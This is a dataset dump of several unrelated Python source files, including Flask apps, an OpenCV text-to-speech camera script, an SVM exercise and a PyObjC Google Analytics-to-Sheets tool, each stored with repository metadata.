mutants\n","sub_path":"method/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"516298182","text":"import argparse\nimport yaml\nimport yaql\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--site_config', help=\"Compiled Site Level Configuration YAML file\")\n parser.add_argument('--execution_id', help=\"ID of lightweight component\")\n parser.add_argument('--output_dir', help=\"Output directory\")\n args = parser.parse_args()\n return {\n 'augmented_site_level_config_file': args.site_config,\n 'execution_id': args.execution_id,\n 'output_dir': args.output_dir\n }\n\n\ndef get_current_lightweight_component(data, execution_id):\n current_lightweight_component = None\n for lightweight_component in data['lightweight_components']:\n if lightweight_component['execution_id'] == int(execution_id):\n current_lightweight_component = lightweight_component\n break\n return current_lightweight_component\n\ndef get_spark_env_file_content(data, execution_id):\n spark_env = []\n current_lightweight_component = get_current_lightweight_component(data, execution_id)\n master_url = current_lightweight_component['config']['spark_master']\n spark_env.append(\"export SPARK_MASTER={master}:7077\".format(master=master_url))\n spark_env.append(\"export SPARK_HOME=/spark\")\n spark_env.append(\"export SPARK_CONF_DIR=\\\"${SPARK_CONF_DIR:-\\\"${SPARK_HOME}\\\"/conf}\\\"\")\n return \"\\n\".join(spark_env)\n\n\ndef get_spark_default_config_file_content(data, execution_id):\n current_lightweight_component = get_current_lightweight_component(data, execution_id)\n config = []\n config_section = current_lightweight_component['config']\n spark_eventLog_enabled = config_section['spark_eventLog_enabled']\n config.append(\"spark.eventLog.enabled {value}\".format(value=str(spark_eventLog_enabled).lower()))\n spark_ui_enabled = config_section['spark_ui_enabled']\n config.append(\"spark.ui.enabled {value}\".format(value=str(spark_ui_enabled).lower()))\n # process supplemental config\n supplemental_config = current_lightweight_component['supplemental_config']\n for config_file in supplemental_config:\n if config_file == \"spark-defaults.conf\":\n for config_value in supplemental_config['spark-defaults.conf']:\n config.append(config_value)\n return \"\\n\".join(config)\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n execution_id = args['execution_id']\n site_config_filename = args['augmented_site_level_config_file']\n site_config = open(site_config_filename, 'r')\n data = yaml.load(site_config)\n output_dir = args['output_dir']\n spark_default_config_file = open(\"{output_dir}/spark-defaults.conf\".format(output_dir=output_dir), 'w')\n spark_default_config_file.write(get_spark_default_config_file_content(data, execution_id))\n spark_default_config_file.close()\n\n spark_env_file = open(\"{output_dir}/spark_env.conf\".format(output_dir=output_dir), 'w')\n spark_env_file.write(get_spark_env_file_content(data, execution_id))\n spark_env_file.close()","sub_path":"sh/pre_config/pre_config.py","file_name":"pre_config.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"261223898","text":"import datetime\nfrom flask import abort, Flask, make_response, url_for, redirect, render_template, request, Response, session\nfrom authlib.flask.client import OAuth\nfrom werkzeug.contrib.fixers import ProxyFix\nfrom applicationinsights.flask.ext import AppInsights\nimport os\nimport io\nimport csv\n\napp = Flask(__name__)\n\n# Check for existence of required environment variables\nif 'APP_SECRET_KEY' not in os.environ:\n raise KeyError('APP_SECRET_KEY not found.')\nif 'TAPKEY_CLIENT_ID' not in os.environ:\n raise KeyError('TAPKEY_CLIENT_ID not found.')\nif 'TAPKEY_CLIENT_SECRET' not in os.environ:\n raise KeyError('TAPKEY_CLIENT_SECRET not found.')\nif 'TAPKEY_TOKEN_ENDPOINT' not in os.environ:\n raise KeyError('TAPKEY_TOKEN_ENDPOINT not found.')\nif 'TAPKEY_AUTHORIZATION_ENDPOINT' not in os.environ:\n raise KeyError('TAPKEY_AUTHORIZATION_ENDPOINT not found.')\nif 'TAPKEY_BASE_URI' not in os.environ:\n raise KeyError('TAPKEY_BASE_URI not found.')\n\n# Set the secret key to some random bytes\napp.secret_key = bytearray(os.environ.get('APP_SECRET_KEY'), encoding=\"utf-8\")\n\n# Apply fix for https redirects behind a proxy (required for Azure only)\napp.wsgi_app = ProxyFix(app.wsgi_app)\n\n# Application Insights (required for Azure only)\nif 'APPINSIGHTS_INSTRUMENTATIONKEY' in os.environ:\n app.config['APPINSIGHTS_INSTRUMENTATIONKEY'] = os.environ.get('APPINSIGHTS_INSTRUMENTATIONKEY')\n AppInsights(app)\n\n\ndef fetch_tapkey_token():\n return session.get('auth')\n\n\noauth = OAuth(app)\noauth.register('tapkey',\n client_id=os.environ.get('TAPKEY_CLIENT_ID'),\n client_secret=os.environ.get('TAPKEY_CLIENT_SECRET'),\n access_token_url=os.environ.get('TAPKEY_TOKEN_ENDPOINT'),\n access_token_params=None,\n authorize_url=os.environ.get('TAPKEY_AUTHORIZATION_ENDPOINT'),\n api_base_url=f\"{os.environ.get('TAPKEY_BASE_URI')}/api/v1/\",\n client_kwargs={\n 'scope': 'read:owneraccounts read:core:entities read:logs offline_access',\n },\n fetch_token=fetch_tapkey_token,\n )\noauth.init_app(app)\n\n\n@app.route('/')\ndef status():\n return 'Service is running.'\n\n\n@app.route('/tapkey')\ndef login():\n redirect_uri = url_for('authorize', _external=True)\n return oauth.tapkey.authorize_redirect(redirect_uri)\n\n\n@app.route('/tapkey/callback')\ndef authorize():\n token = oauth.tapkey.authorize_access_token()\n session['auth'] = token\n return redirect(url_for('owner_account_chooser'))\n\n\n@app.route('/export')\ndef owner_account_chooser():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n for owner_account in owner_accounts:\n resp = oauth.tapkey.get(f\"Owners/{owner_account['id']}/BoundLocks\")\n owner_account['bound_locks'] = resp.json()\n return render_template('export.html', owner_accounts=owner_accounts)\n\n\n@app.route('/download')\ndef download():\n owner_account_id = request.args.get('owner_account_id')\n bound_lock_id = request.args.get('bound_lock_id')\n\n if owner_account_id is None or bound_lock_id is None or owner_account_id.isspace() or bound_lock_id.isspace():\n abort(400)\n abort(Response('Owner Account and Bound Lock required.'))\n return\n\n # Get BoundLock details\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/BoundLocks/{bound_lock_id}\")\n bound_lock = resp.json()\n\n # Get LogEntries for BoundLock\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/BoundLocks/{bound_lock_id}/LogEntries?\"\n f\"$filter=logType eq 'Command' and command eq 'TriggerLock'&\"\n f\"$select=id,entryNo,lockTimestamp,receivedAt,boundCardId,contactId&\")\n log_entries = resp.json()\n\n # Get required Contacts\n contacts = []\n contact_ids = list(set(map(lambda x: x['contactId'], log_entries)))\n if not all(x is None for x in contact_ids):\n contact_ids_filter = '$filter=' + ' or '.join(map(lambda x: f\"id eq '{x}'\", contact_ids))\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/Contacts?{contact_ids_filter}&\"\n f\"$select=id,email\")\n contacts = resp.json()\n\n # Get required BoundCards\n bound_cards = []\n bound_card_ids = list(set(map(lambda x: x['boundCardId'], log_entries)))\n if not all(x is None for x in bound_card_ids):\n bound_card_ids_filter = '$filter=' + ' or '.join(map(lambda x: f\"id eq '{x}'\", bound_card_ids))\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/BoundCards?{bound_card_ids_filter}&\"\n f\"$select=id,title\")\n bound_cards = resp.json()\n\n output = io.StringIO()\n writer = csv.writer(output, quoting=csv.QUOTE_NONNUMERIC)\n\n # Write column names\n row = [\n 'Contact ID',\n 'Contact Email',\n 'NFC Transponder ID',\n 'NFC Transponder Title',\n 'Lock Timestamp',\n 'Entry Number',\n 'Received At',\n 'ID'\n ]\n writer.writerow(row)\n\n # Write log entries\n for entry in log_entries:\n contact = next((x for x in contacts if x['id'] == entry['contactId']), None)\n bound_card = next((x for x in bound_cards if x['id'] == entry['boundCardId']), None)\n row = [\n entry['contactId'],\n contact['email'] if contact else None,\n entry['boundCardId'],\n bound_card['title'] if bound_card else None,\n entry['lockTimestamp'],\n entry['entryNo'],\n entry['receivedAt'],\n entry['id']\n ]\n writer.writerow(row)\n response = make_response(output.getvalue())\n cd = f\"attachment; filename={bound_lock['id']}_{datetime.datetime.now().strftime('%Y-%m-%dT%H%M%S')}.csv\"\n response.headers['Content-Disposition'] = cd\n response.mimetype='text/csv'\n return response\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"466574337","text":"from app import app, db\nimport pandas\nimport numpy\nfrom flask import render_template, flash, redirect, session, url_for, request, g\nfrom .models import User, Balance, Transactions\nfrom .forms import UploadForm\nimport sys\nfrom werkzeug.utils import secure_filename\nfrom config import UPLOAD_FOLDER\n\n\n@app.before_request\ndef before_request():\n g.user = User.query.get(1)\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n user = g.user\n balance = g.user.get_balance()\n form = UploadForm()\n return render_template('index.html',\n title='Home',\n user=user,\n balance=balance,\n form=form)\n\n@app.route('/upload2', methods=['GET', 'POST'])\ndef upload2():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(url_for('index'))\n file = request.files['file']\n # if user does not select file, browser submits an empty part without the filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file:\n filename = secure_filename(file.filename)\n print(filename, file=sys.stderr)\n read = pandas.read_csv(file)\n print (file, file=sys.stderr)\n print(read, file=sys.stderr)\n flash('File Uploaded!')\n return redirect(url_for('index'))\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n form = UploadForm()\n if form.validate_on_submit():\n file = form.upload.data\n read = pandas.read_csv(file)\n print(read, file=sys.stderr)\n flash('File Uploaded!')\n return redirect(url_for('index'))\n flash('Invalid File')\n return redirect(url_for('index'))\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"388632159","text":"mesFinal = int(input(\"Até qual mês devo calcular a reprodução dos coelhos?\\n\"))\ncount = 1 \n\nanterior = 0\ninicio = 1\nprint(inicio)\nwhile count < mesFinal:\n proximo = inicio + anterior\n print(proximo)\n anterior = inicio\n inicio = proximo\n count = count + 1\n\nprint(\"Até o mês descrito( \", mesFinal, \")\\nvocê terá\", proximo, \"casais de coelhinhos\")\n\nimport time\ntime.sleep(2)","sub_path":"Scripts/12_Fibonacci.py","file_name":"12_Fibonacci.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"438953297","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom solo.models import SingletonModel\n\n\nclass FormsConfig(SingletonModel):\n organisatie_rsin = models.CharField(\n _(\"RSIN organisatie\"), max_length=9, default=\"002220647\"\n )\n\n # event permits\n zaaktype_event_permit = models.URLField(_(\"zaaktype evenementvergunning\"))\n\n class Meta:\n verbose_name = \"Applicatieconfiguratie\"\n","sub_path":"src/forms_ui/config/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"354413573","text":"import cv2\nfrom indexClass import DetextText\n\nimport os\n\nurl = 'http://192.168.1.21:8080/video'\nvc = cv2.VideoCapture(url)\nobj = DetextText()\n\ndef showCamera():\n vc = cv2.VideoCapture(url)\n\n while(True):\n try:\n ret, frame = vc.read()\n cv2.namedWindow('frame', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('frame', 800, 600)\n cv2.imshow('frame',frame)\n key = cv2.waitKey(1)\n if key == 27: # exit on ESC\n print(\"Turning off camera\")\n vc.release()\n print(\"Program ended\")\n cv2.destroyAllWindows()\n exit()\n if key == 32:\n cv2.imwrite(filename='abc.jpg',img=frame)\n print(\"Turning off camera\")\n vc.release()\n print(\"Program ended\")\n cv2.destroyAllWindows()\n listDetectedWords = obj.getDetectedWords(\"abc.jpg\", True)\n text = \"\"\n for element in listDetectedWords:\n text += element\n text += ' '\n\n print(text)\n obj.toSound(listDetectedWords)\n vc = cv2.VideoCapture(url)\n except(KeyboardInterrupt): \n print(\"Turning off camera\")\n vc.release()\n print(\"Program ended\")\n cv2.destroyAllWindows()\n break\n\n\nshowCamera()","sub_path":"src/opencamera.py","file_name":"opencamera.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"15096643","text":"import datetime, pytz\n\nfrom docs.invoices.models import Invoice, InvoiceSent\nfrom docs.recurs.models import MetaRecur, RecurType, Recur, RecurInstance\nfrom docs.recurs.utils import create_recur_invoice\n\n\nrt = RecurType.objects.filter(name__icontains='host')[0]\nrs = RecurInstance.objects.all()\nr = Recur.objects.filter(live=1, dd=0,type=rt)\ntoday = datetime.datetime.date(datetime.datetime.now(pytz.timezone('Australia/Sydney')))\n\n \ndef find_next_start(x):\n t = datetime.timedelta(days=1)\n try:\n ro = rs.filter(recur=x).order_by('-cover_end')[0]\n next_start = ro.cover_end + t\n except:\n next_start = x.start \n return next_start\n \ndef current_hosting(gen=False): \n i = 0\n l = {}\n for x in r:\n next_due = find_next_start(x)\n m = MetaRecur.objects.get(name='check_within_days')\n d = datetime.timedelta(days=float(m.value))\n is_due = next_due-d\n try: \n ro = rs.filter(recur=x).order_by('-cover_end')[0]\n end = ro.cover_end\n except: \n end = x.start\n # TD: not convinced that the 2 things going on below shouldn't be seperated\n if is_due=0):\r\n return(1)\r\n else:\r\n return(0)\r\n\r\ndef predict_linear(X,W,b):\r\n p=[]\r\n for i in range(X.shape[0]):\r\n z=( (W[0][0]*X[i,0]) + (W[0][1]*X[i,1]) )+b\r\n p.append(signum(z))\r\n\r\n return(p)\r\n\r\ndef predict_rbf(X,alpha,sv,b,m,gamma):\r\n p=[]\r\n for i in range(X.shape[0]):\r\n z=0\r\n for j in range(m):\r\n z=z+( alpha[0][j]*rbf_kernel(X[i],sv[j],gamma) )\r\n p.append(signum(z+b))\r\n \r\n return(p)\r\n\r\ndef accuracy(X,Y):\r\n p=0\r\n t=len(X)\r\n for i in range(t):\r\n if(X[i]==Y[i]):\r\n p=p+1\r\n \r\n return((p*100)/t)\r\n\r\n\r\nfor i in range(4,6):\r\n filename=\"data_\"+str(i)+\".h5\"\r\n f=h5py.File(filename,'r')\r\n l=list(f.keys())\r\n attri=np.array(f[l[0]])\r\n label=np.array(f[l[1]])\r\n\r\n m=label.shape[0]\r\n train_size=(m*80)//100\r\n test_size=(m*20)//100\r\n\r\n training_data_X=np.delete(attri,[i for i in range(test_size) ],axis=0)\r\n training_data_Y=np.delete(label,[i for i in range(test_size) ],axis=0)\r\n testing_data_X=attri[0:test_size,:]\r\n testing_data_Y=label[0:test_size]\r\n\r\n clf=svm.SVC(kernel='linear',C=1)\r\n clf.fit(training_data_X,training_data_Y)\r\n W=clf.coef_\r\n b=clf.intercept_\r\n \r\n training_predict=predict_linear(training_data_X,W,b)\r\n testing_predict=predict_linear(testing_data_X,W,b)\r\n\r\n print(\"Data Set \"+str(i))\r\n print(\"Accuracy on training Data with implemented predict function (Linear SVM): \"+str(accuracy(training_predict,training_data_Y))) \r\n print(\"Accuracy on training Data with Sklearn predict function (Linear SVM): \"+str(clf.score(training_data_X,training_data_Y)*100))\r\n print()\r\n print(\"Accuracy on testing Data with implemented predict function (Linear SVM): \"+str(accuracy(testing_predict,testing_data_Y))) \r\n print(\"Accuracy on testing Data with Sklearn predict function (Linear SVM): \"+str(clf.score(testing_data_X,testing_data_Y)*100))\r\n print()\r\n\r\n\r\n g=1/(2*np.var(training_data_X))\r\n clf=svm.SVC(kernel='rbf',gamma='scale',C=1)\r\n clf.fit(training_data_X,training_data_Y)\r\n alpha=clf.dual_coef_\r\n support_vectors=clf.support_vectors_\r\n b=clf.intercept_\r\n m=sum(clf.n_support_)\r\n \r\n training_predict_rbf=predict_rbf(training_data_X,alpha,support_vectors,b,m,g)\r\n testing_predict_rbf=predict_rbf(testing_data_X,alpha,support_vectors,b,m,g)\r\n\r\n print(\"Data Set \"+str(i))\r\n print(\"Accuracy on training Data with implemented predict function (RBF Kernel): \"+str(accuracy(training_predict_rbf,training_data_Y))) \r\n print(\"Accuracy on training Data with Sklearn predict function (RBF Kernel): \"+str(clf.score(training_data_X,training_data_Y)*100))\r\n print()\r\n print(\"Accuracy on testing Data with implemented predict function (RBF Kernel): \"+str(accuracy(testing_predict_rbf,testing_data_Y))) \r\n print(\"Accuracy on testing Data with Sklearn predict function (RBF Kernel): \"+str(clf.score(testing_data_X,testing_data_Y)*100))\r\n print()\r\n","sub_path":"Assignment 2/1D.py","file_name":"1D.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"49384195","text":"# -*- coding: utf8 -*-\r\n##########################################\r\n#\r\n# Exercices en Python\r\n# Base 2 en Base 10\r\n# A.BAUDET 20/12/2019\r\n#\r\n##########################################\r\n\r\ncnbr = input('Nombre en base 2 à transposer en base 10 : ')\r\nlength = len(cnbr)\r\ni = 0\r\ncalc = 0\r\nscnbr = '0'\r\ntnbr = 0\r\nresult = 0\r\ndeb = cnbr\r\n\r\nwhile i < length:\r\n snbr = cnbr[i]\r\n tnbr = int(snbr)\r\n result = tnbr * 2 ** (length - i - 1)\r\n calc = result + calc\r\n i = i + 1\r\n\r\nprint(deb, 'en base 2 est', calc, 'en base 10.')\r\n","sub_path":"Vendredi 20-12-2019/Base2-Base10.py","file_name":"Base2-Base10.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"445524434","text":"# Ubermetrics.py\n# Contains the class corresponding to the application\n\nfrom apiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nimport httplib2\nfrom oauth2client import client\nfrom oauth2client import file\nfrom oauth2client import tools\nimport json\nimport argparse\nimport sys\nfrom datetime import date, timedelta\nimport os\n\nimport functions # Python script containing the following functions: get_service, get_value,\n# fill_spreadsheet and str_from_list\n\nfrom Cocoa import *\nfrom Foundation import NSObject\n\nclass UbermetricsController(NSWindowController):\n valueTextField = objc.IBOutlet()\n startDatePicker = objc.IBOutlet()\n endDatePicker = objc.IBOutlet()\n viewIdTextField = objc.IBOutlet()\n metricsTextField = objc.IBOutlet()\n dimensionsTextField = objc.IBOutlet()\n sortTextField = objc.IBOutlet()\n filtersTextField = objc.IBOutlet()\n maxResultsTextField = objc.IBOutlet()\n\n spreadsheetIdTextField = objc.IBOutlet()\n sheetNameTextField = objc.IBOutlet()\n rangeTextField = objc.IBOutlet()\n\n checkBoxNumericValues = objc.IBOutlet()\n\n spreadsheetIdStackField = objc.IBOutlet()\n sheetNameStackField = objc.IBOutlet()\n checkBoxSpreadsheetData = objc.IBOutlet()\n\n def windowDidLoad(self):\n NSWindowController.windowDidLoad(self)\n\n # Path to the files\n self.dirpath = str(os.getcwd()) + '/../../../../'\n\n # Define the auth scopes to request.\n scopeSheets = ['https://www.googleapis.com/auth/spreadsheets']\n scopeAnalytics = ['https://www.googleapis.com/auth/analytics.readonly']\n\n # Authenticate and construct services.\n self.serviceAnalytics = functions.get_service('analytics', 'v3', scopeAnalytics, self.dirpath + 'credentials.json')\n self.serviceSheets = functions.get_service('sheets', 'v4', scopeSheets, self.dirpath + 'credentials.json')\n\n # Value to display\n self.value = ''\n\n # Get previous entered values\n with open(self.dirpath + 'temp.json', 'r+') as f:\n \t self.temp = json.load(f)\n\n # Get data already in the first sheet\n self.checkBoxSpreadsheetData.setState_(int(self.temp[\"checkBoxSpreadsheetData\"]))\n self.spreadsheetIdStack = self.temp[\"spreadsheetIdStack\"]\n if self.spreadsheetIdStack != '':\n self.spreadsheetIdStackField.setStringValue_(self.spreadsheetIdStack)\n elif int(self.checkBoxSpreadsheetData.state()) == 1:\n self.spreadsheetIdStackField.setStringValue_('Spreadsheet ID - Required -')\n self.sheetNameStack = self.temp[\"sheetNameStack\"]\n if self.sheetNameStack != '':\n self.sheetNameStackField.setStringValue_(self.sheetNameStack)\n elif int(self.checkBoxSpreadsheetData.state()) == 1:\n self.sheetNameStackField.setStringValue_('Sheet name - Required -')\n\n # Arguments for getValue function\n self.viewId = self.temp[\"viewId\"]\n if self.viewId != 0:\n self.viewIdTextField.setStringValue_(self.viewId)\n\n startDateStr = self.temp[\"startDate\"].split('-')\n self.startDate = date(int(startDateStr[0]), int(startDateStr[1]), int(startDateStr[2]))\n endDateStr = self.temp[\"endDate\"].split('-')\n self.endDate = date(int(endDateStr[0]), int(startDateStr[1]), int(endDateStr[2]))\n self.startDatePicker.setDateValue_(self.startDate)\n self.endDatePicker.setDateValue_(self.endDate)\n\n self.metrics = self.temp[\"metrics\"]\n if self.metrics != '':\n self.metricsTextField.setStringValue_(self.metrics)\n\n self.dimensions = self.temp[\"dimensions\"]\n if self.dimensions != '':\n self.dimensionsTextField.setStringValue_(self.dimensions)\n self.sort = self.temp[\"sort\"]\n if self.sort != '':\n self.sortTextField.setStringValue_(self.sort)\n self.filters = self.temp[\"filters\"]\n if self.filters != '':\n self.filtersTextField.setStringValue_(self.filters)\n self.maxResults = self.temp[\"maxResults\"]\n if self.maxResults != 0:\n self.maxResultsTextField.setStringValue_(self.maxResults)\n\n # Arguments for fillSpreadsheet function\n self.spreadsheetId = self.temp[\"spreadsheetId\"]\n if self.spreadsheetId != '':\n self.spreadsheetIdTextField.setStringValue_(self.spreadsheetId)\n self.sheetName = self.temp[\"sheetName\"]\n if self.sheetName != '':\n self.sheetNameTextField.setStringValue_(self.sheetName)\n self.range = self.temp[\"range\"]\n if self.range != '':\n self.rangeTextField.setStringValue_(self.range)\n\n # Checkbox to choose to display only numeric values or no\n self.checkBoxNumericValues.setState_(int(self.temp[\"checkBoxNumericValues\"]))\n\n # self.startDatePicker.setTimeZone_(NSTimeZone.localTimeZone())\n # NSLog(str(self.startDatePicker.timeZone()))\n\n # Column values for all clients\n self.values = []\n\n @objc.IBAction\n def setStartDate_(self, sender):\n if self.startDatePicker.dateValue() <= self.endDatePicker.dateValue():\n startDatePickerValue = str(self.startDatePicker.dateValue())[:10].split('-')\n self.startDate = date(int(startDatePickerValue[0]), int(startDatePickerValue[1]), int(startDatePickerValue[2]))\n self.startDate += timedelta(days=1) # Timezone issue to deal with\n self.temp[\"startDate\"] = str(self.startDate)\n else:\n self.value = 'Choose a start date before the end date'\n self.updateDisplay()\n\n @objc.IBAction\n def setEndDate_(self, sender):\n if self.startDatePicker.dateValue() <= self.endDatePicker.dateValue():\n endDatePickerValue = str(self.endDatePicker.dateValue())[:10].split('-')\n self.endDate = date(int(endDatePickerValue[0]), int(endDatePickerValue[1]), int(endDatePickerValue[2]))\n self.endDate += timedelta(days=1) # Timezone issue to deal with\n self.temp[\"endDate\"] = str(self.endDate)\n else:\n self.value = 'Choose a end date after the start date'\n self.updateDisplay()\n\n @objc.IBAction\n def enterViewID_(self, sender): # Must have 7 to 9 figures to write\n if self.viewIdTextField.stringValue(): #.isnumeric()\n self.viewId = self.viewIdTextField.stringValue()\n self.temp[\"viewId\"] = str(self.viewId)\n # self.value = 'Enter a number please'\n else:\n self.viewId = 0\n self.temp[\"viewId\"] = str(self.viewId)\n self.updateDisplay()\n\n @objc.IBAction\n def enterMetrics_(self, sender):\n if self.metricsTextField.stringValue():\n self.metrics = self.metricsTextField.stringValue()\n self.temp[\"metrics\"] = str(self.metrics)\n # self.value = 'This metric does not exist'\n else:\n self.metrics = \"\"\n self.temp[\"metrics\"] = str(self.metrics)\n self.updateDisplay()\n\n @objc.IBAction\n def enterDimensions_(self, sender):\n if self.dimensionsTextField.stringValue():\n self.dimensions = self.dimensionsTextField.stringValue()\n self.temp[\"dimensions\"] = str(self.dimensions)\n # self.value = 'This dimension does not exist'\n else:\n self.dimensions = \"\"\n self.temp[\"dimensions\"] = str(self.dimensions)\n self.updateDisplay()\n\n @objc.IBAction\n def enterSort_(self, sender):\n if self.sortTextField.stringValue():\n self.sort = self.sortTextField.stringValue()\n self.temp[\"sort\"] = str(self.sort)\n # self.value = 'This metric does not exist'\n else:\n self.sort = \"\"\n self.temp[\"sort\"] = str(self.sort)\n self.updateDisplay()\n\n @objc.IBAction\n def enterFilters_(self, sender):\n if self.filtersTextField.stringValue():\n self.filters = self.filtersTextField.stringValue()\n self.temp[\"filters\"] = str(self.filters)\n # self.value = 'Enter a correct filter'\n else:\n self.filters = \"\"\n self.temp[\"filters\"] = str(self.filters)\n self.updateDisplay()\n\n @objc.IBAction\n def setMaxResults_(self, sender):\n if self.maxResultsTextField.stringValue():\n if int(self.maxResultsTextField.stringValue()) > 0 and int(self.maxResultsTextField.stringValue()) < 1000:\n self.maxResults = int(self.maxResultsTextField.stringValue())\n self.temp[\"maxResults\"] = str(self.maxResults)\n else:\n self.value = 'Choose a number between 1 and 1000'\n self.updateDisplay()\n else:\n self.maxResults = 0\n self.temp[\"maxResults\"] = str(self.maxResults)\n self.updateDisplay()\n\n @objc.IBAction\n def setSpreadsheetID_(self, sender): # RegEx ([a-zA-Z0-9-_]+)\n if self.spreadsheetIdTextField.stringValue():\n self.spreadsheetId = self.spreadsheetIdTextField.stringValue()\n self.temp[\"spreadsheetId\"] = str(self.spreadsheetId)\n # self.value = 'Enter a correct Spreadsheet Id'\n else:\n self.spreadsheetId = \"\"\n self.temp[\"spreadsheetId\"] = str(self.spreadsheetId)\n self.updateDisplay()\n\n @objc.IBAction\n def setSheetName_(self, sender):\n if self.sheetNameTextField.stringValue():\n self.sheetName = self.sheetNameTextField.stringValue()\n self.temp[\"sheetName\"] = str(self.sheetName)\n # self.value = 'This sheet does not exist'\n else:\n self.sheetName = \"\"\n self.temp[\"sheetName\"] = str(self.sheetName)\n self.updateDisplay()\n\n @objc.IBAction\n def setRange_(self, sender):\n if self.rangeTextField.stringValue():\n self.range = self.rangeTextField.stringValue()\n self.temp[\"range\"] = str(self.range)\n # self.value = 'Enter a correct range'\n else:\n self.range = \"\"\n self.temp[\"range\"] = str(self.range)\n self.updateDisplay()\n\n @objc.IBAction\n def setSpreadsheetIDStack_(self, sender): # RegEx ([a-zA-Z0-9-_]+)\n if self.spreadsheetIdStackField.stringValue():\n self.spreadsheetIdStack = self.spreadsheetIdStackField.stringValue()\n self.temp[\"spreadsheetIdStack\"] = str(self.spreadsheetIdStack)\n # self.value = 'Enter a correct Spreadsheet Id'\n else:\n self.spreadsheetIdStack = \"\"\n self.temp[\"spreadsheetIdStack\"] = str(self.spreadsheetIdStack)\n self.updateDisplay()\n self.refreshArguments()\n\n @objc.IBAction\n def setSheetNameStack_(self, sender):\n if self.sheetNameStackField.stringValue():\n self.sheetNameStack = self.sheetNameStackField.stringValue()\n self.temp[\"sheetNameStack\"] = str(self.sheetNameStack)\n # self.value = 'This sheet does not exist'\n else:\n self.sheetNameStack = \"\"\n self.temp[\"sheetNameStack\"] = str(self.sheetNameStack)\n self.updateDisplay()\n self.refreshArguments()\n\n @objc.IBAction\n def displayValue_(self, sender):\n if self.viewId != 0 and self.startDate <= self.endDate and self.metrics != '':\n try:\n if int(self.checkBoxSpreadsheetData.state()) == 1:\n self.viewId, self.metrics, self.dimensions, self.sort, self.filters, self.maxResults \\\n = functions.get_data_from_spreadsheet([self.viewId, self.metrics, self.dimensions, self.sort, \\\n self.filters, self.maxResults], self.serviceSheets, self.spreadsheetIdStack, self.sheetNameStack)\n self.value = ''\n viewIds = self.viewId.split(',')\n for viewId in viewIds:\n value = functions.get_value(self.serviceAnalytics, viewId, str(self.startDate), str(self.endDate), self.metrics, self.dimensions, self.sort, self.filters, self.maxResults)\n self.value += functions.str_from_list(value) + '\\n'\n if len(value[0]) == 1:\n value[0].append('')\n value[0].reverse()\n self.values += value\n with open(self.dirpath + 'temp.json', 'w') as f:\n json.dump(self.temp, f, indent=4)\n except (HttpError) as e:\n self.value = json.loads(e.content.decode('utf-8'))['error']['message']\n else:\n if self.viewId == 0:\n self.value = 'You must enter a view ID'\n elif self.startDate > self.endDate:\n self.value = 'Choose a possible date range'\n else:\n self.value = 'You must enter a metric'\n self.updateDisplay()\n\n @objc.IBAction\n def fillSpreadsheet_(self, sender):\n if self.values != [] and self.spreadsheetId != '' and self.sheetName != '' and self.range != '':\n self.temp[\"checkBoxNumericValues\"] = self.checkBoxNumericValues.state()\n if int(self.checkBoxNumericValues.state()) == 1:\n functions.fill_spreadsheet(self.serviceSheets, self.spreadsheetId, self.sheetName, self.range, [[value[1]] for value in self.values])\n else:\n functions.fill_spreadsheet(self.serviceSheets, self.spreadsheetId, self.sheetName, self.range, self.values)\n with open(self.dirpath + 'temp.json', 'w') as f:\n json.dump(self.temp, f, indent=4)\n self.value = \"Done!\"\n else:\n if self.values == []:\n self.value = 'You did not add values for the moment'\n elif self.spreadsheetId == '':\n self.spreadsheetIdTextField.setStringValue_('Spreadsheet ID - Required -')\n self.value = 'You must enter a spreadsheet ID'\n elif self.sheetName == '':\n self.sheetNameTextField.setStringValue_('Sheet name - Required -')\n self.value = 'You must enter a sheet name'\n else:\n self.rangeTextField.setStringValue_('Range (e.g. A1:B2) - Required -')\n self.value = 'You must enter a range'\n self.updateDisplay()\n\n @objc.IBAction\n def emptyValues_(self, sender):\n self.values = []\n self.value = 'Previous values have been erased'\n self.updateDisplay()\n\n def updateDisplay(self):\n if self.value.count('\\n') > 64:\n self.valueTextField.setStringValue_('\\n'.join(self.value.split('\\n')[:64])+'\\n and ' + str(self.value.count('\\n')-64) + ' others values...')\n else:\n self.valueTextField.setStringValue_(self.value)\n\n if self.spreadsheetIdStack == '':\n if int(self.checkBoxSpreadsheetData.state()) == 1:\n 